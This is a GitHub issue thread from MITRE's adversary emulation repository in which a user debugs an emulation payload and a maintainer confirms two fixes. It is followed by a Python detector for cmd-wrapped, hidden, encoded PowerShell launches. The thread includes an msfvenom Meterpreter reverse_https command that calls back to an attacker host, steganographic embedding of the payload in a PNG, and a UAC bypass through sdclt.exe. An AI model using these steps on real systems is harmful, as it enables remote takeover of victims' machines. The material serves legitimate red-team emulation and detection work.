mitre-attack / attack-arsenal

A collection of red team and adversary emulation resources developed and released by MITRE.
Apache License 2.0

Day 1: Privilege Escalation Payload #6

Closed leegengyu closed 4 years ago

leegengyu commented 4 years ago

Issue 1

It is stated that the first step to re-create the monkey.png is msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker IP> LPORT=443 --format psh-cmd -o meterpreter.ps1.

However, by using --format psh-cmd, I was thinking that the output from the command would actually be meant to be run in a Command Prompt (rather than in a PowerShell). According to a Rapid7 link about generating PowerShell payloads, "the generated payload for psh-cmd format has a .cmd extension." Nonetheless, the psh-cmd format was stated under the section for PowerShell payloads (which had me puzzled).

Looking deeper into this, we see that the very first word in meterpreter.ps1 is %COMSPEC%: [image]

Subsequently, meterpreter.ps1 is embedded into a PNG file using Invoke-PSImage as mentioned.

From what I understand, in Step 3.B, the one-liner will execute the contents of meterpreter.ps1 in a PowerShell after extracting it from the pixels of monkey.png. The one-liner is only executed towards the end of Step 3.B, when %windir%\system32\sdclt.exe is executed.

In this context, this would mean that %COMSPEC% is executed in a PowerShell, which resulted in this error on the victim machine (I removed -noni and -window hidden in this case for debugging purposes): [image]

To confirm the above, I tried to run it verbatim as %COMSPEC%: [image]

The way to get the environment variable in PowerShell would be $env:ComSpec: [image]

In light of the above, I changed the format from psh-cmd to psh, and I managed to get a Meterpreter session opened.

Should the format be psh-cmd (i.e. I missed out something or ran something wrongly, etc.), or is there a typo (i.e. it should be psh)?

Issue 2

I think there is a typo for the Invoke-PSImage command.

The current command in payload_configs.md is Invoke-PSImage -Script .\meterpreter.ps1.ps1 -Out .\monkey.png -Image .\monkey.jpg.

There is an extra .ps1 in the parameter -Script.

jcwilliamsATmitre commented 4 years ago

@leegengyu Great catch, thanks! I just submitted a fix but you are correct in both cases.

The psh-cmd payload results in cmd /c powershell.exe... whereas the psh payload uses PowerShell to load kernel32.dll and allocate + execute a new thread.

Thanks again, and definitely let us know if you come across any more!
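The launch shape jcwilliamsATmitre describes for the psh-cmd format (cmd /c powershell.exe ...) is also what shows up in process-creation telemetry: a cmd.exe parent starting powershell.exe with non-interactive, hidden-window and encoded-command switches. The following Python is an added example, not code from this thread or from the attack-arsenal project; it scores constructed (parent image, command line) events for that shape and decodes the -EncodedCommand argument. The switch spellings are the documented PowerShell short forms; the sample events and the encoded script are constructed.

```python
import base64
import re

# Short forms of PowerShell switches; the psh-cmd wrapper uses these, not the long names.
WINDOW_FLAGS = {"-w", "-win", "-window", "-windowstyle"}
NONINTERACTIVE_FLAGS = {"-noni", "-noninteractive"}
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}
POWERSHELL_IMAGE = re.compile(r"(^|\\)(powershell|pwsh)(\.exe)?$", re.IGNORECASE)

def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of UTF-16LE script text; None if it does not parse."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(parent_image, cmdline):
    """Describe a PowerShell launch; None when the child process is not PowerShell."""
    tokens = cmdline.split()
    if not tokens or not POWERSHELL_IMAGE.search(tokens[0].strip('"')):
        return None
    lowered = [t.lower() for t in tokens] + [""]  # sentinel so lowered[i + 1] is always valid
    report = {"cmd_wrapper": parent_image.rsplit("\\", 1)[-1].lower() == "cmd.exe",
              "hidden_window": False, "non_interactive": False, "decoded_command": None}
    for i in range(1, len(tokens)):
        flag, nxt = lowered[i], lowered[i + 1]
        if flag in WINDOW_FLAGS and nxt == "hidden":
            report["hidden_window"] = True
        elif flag in NONINTERACTIVE_FLAGS:
            report["non_interactive"] = True
        elif flag in ENCODED_FLAGS and nxt:
            report["decoded_command"] = decode_encoded_command(tokens[i + 1])  # original case
    traits = [report["cmd_wrapper"], report["hidden_window"], report["non_interactive"],
              report["decoded_command"] is not None]
    report["suspicious"] = sum(traits) >= 2  # two or more together is the psh-cmd launch shape
    return report

# Constructed sample (parent image, child command line) events; the encoded script is benign.
ENCODED = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\cmd.exe", f"powershell.exe -noni -window hidden -e {ENCODED}"),
    ("C:\\Windows\\explorer.exe", "powershell.exe -File C:\\scripts\\nightly.ps1"),
    ("C:\\Windows\\System32\\cmd.exe", "ipconfig /all"),
]

def flagged_events(events=SAMPLE_EVENTS):
    """Return the events whose child is a PowerShell launch with the wrapper shape."""
    return [(p, cl) for p, cl in events if (r := analyze(p, cl)) and r["suspicious"]]
```

A single trait such as -w hidden also appears in legitimate scheduled scripts, which is why the score requires at least two of them together before an event is flagged.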